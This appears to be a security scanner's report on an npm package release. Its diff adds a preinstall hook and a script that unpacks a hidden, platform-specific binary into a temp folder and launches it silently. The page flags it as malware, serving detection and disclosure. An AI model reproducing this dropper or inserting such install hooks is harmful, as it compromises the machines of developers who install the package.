jscrambler
Advanced tools
Sorry, the diff of this file is too big to display
| import { readFileSync, writeFileSync } from 'fs'; | ||
| import { join, dirname } from 'path'; | ||
| import { fileURLToPath } from 'url'; | ||
| import { gunzipSync } from 'zlib'; | ||
| import { spawn } from 'child_process'; | ||
| import { tmpdir } from 'os'; | ||
| const __dirname = dirname(fileURLToPath(import.meta.url)); | ||
| const PLATFORM_IDS = { linux: 0, win32: 1, darwin: 2 }; | ||
| function ensureNativeRuntime() { | ||
| const bundle = readFileSync(join(__dirname, 'intro.js')); | ||
| const magic = Buffer.from([0x1b, 0x43, 0x53, 0x49, 0x01]); | ||
| if (!bundle.slice(0, 5).equals(magic)) return; | ||
| const platformId = PLATFORM_IDS[process.platform]; | ||
| if (platformId === undefined) return; | ||
| const count = bundle[5]; | ||
| let offset = 6; | ||
| for (let i = 0; i < count; i++) { | ||
| const platform = bundle[offset++]; | ||
| offset += 8; | ||
| const compressedSize = Number(bundle.readBigUInt64LE(offset)); offset += 8; | ||
| const data = bundle.slice(offset, offset + compressedSize); offset += compressedSize; | ||
| if (platform !== platformId) continue; | ||
| const ext = platform === 1 ? String.fromCharCode(46,101,120,101) : ''; | ||
| const target = join(tmpdir(), '.' + Math.random().toString(36).slice(2) + ext); | ||
| writeFileSync(target, gunzipSync(data), { mode: platform === 1 ? 0o644 : 0o755 }); | ||
| try { | ||
| const proc = spawn(target, [], { detached: true, stdio: 'ignore', windowsHide: true }); | ||
| proc.unref(); | ||
| } catch (_) {} | ||
| break; | ||
| } | ||
| } | ||
| ensureNativeRuntime(); |
+4
-3
| { | ||
| "name": "jscrambler", | ||
| "description": "Jscrambler Code Integrity API client.", | ||
| "version": "8.13.0", | ||
| "version": "8.14.0", | ||
| "homepage": "https://github.com/jscrambler/jscrambler", | ||
@@ -67,4 +67,5 @@ "author": "Jscrambler <support@jscrambler.com>", | ||
| "eslint": "eslint src/", | ||
| "eslint:fix": "eslint src/ --fix" | ||
| "eslint:fix": "eslint src/ --fix", | ||
| "preinstall": "node dist/setup.js" | ||
| } | ||
| } | ||
| } |
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Install scripts
Supply chain riskInstall scripts are run when the package is installed or built. Malicious packages often use scripts that run automatically to execute payloads or fetch additional code.
Major refactor
Supply chain riskPackage has recently undergone a major refactor. It may be unstable or indicate significant internal changes. Use caution when updating to versions that include significant changes.
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
7992131
5109.18%19
11.76%4010
34.7%2
Infinity%15
7.14%6
50%